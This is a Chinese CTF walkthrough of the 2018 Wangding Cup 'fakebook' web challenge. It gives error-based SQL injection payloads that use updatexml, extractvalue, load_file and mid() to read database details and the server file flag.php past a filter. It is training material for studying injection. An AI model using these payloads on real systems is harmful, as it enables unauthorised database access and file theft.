zoukankan      html  css  js  c++  java
  • CTF-WEB-网鼎杯2018-fakebook

    CTF-WEB-网鼎杯2018-fakebook

    题目链接
    知识考察:SQL报错注入+注入防火墙绕过

    解题思路

    1、首先注册账号,看到url:http://220.249.52.133:41721/view.php?no=1

    2、尝试对no进行注入payload:1',有报错信息显示,证明存在注入点

    3、开始进行SQL注入,联合查询提示no hack,被防火墙阻拦

    4、尝试报错注入,注入成功,可以读取数据库名称、表名,但是没有在数据库找到flag

    http://220.249.52.133:41721/view.php?no=1 and updatexml(1,concat(0,database(),0,user(),0,@@datadir),1)#
    

    5、尝试使用load_file()函数,fuzz,flag.php,可以看到存在flag.php文件在/var/www/html/目录下

    and (extractvalue(1,concat(0,(select (LOAD_FILE('/var/www/html/flag.php'))),0)))#
    


    6、因为updatexml、extractvalue有32位显示限制,结合mid()函数,读出全部flag内容

     and updatexml(1,concat(1,0,(select mid(load_file('/var/www/html/flag.php'),21))),1)#
    

  • 相关阅读:
    字段操作
    数据操作
    表操作
    数据库操作
    如何连接mysql
    mysql新增用户和修改用户密码
    表和库和服务器的关系
    MySql的复合类型
    yum软件源
    常用正则表达式
  • 原文地址:https://www.cnblogs.com/renhaoblog/p/14081011.html
Copyright © 2011-2022 走看看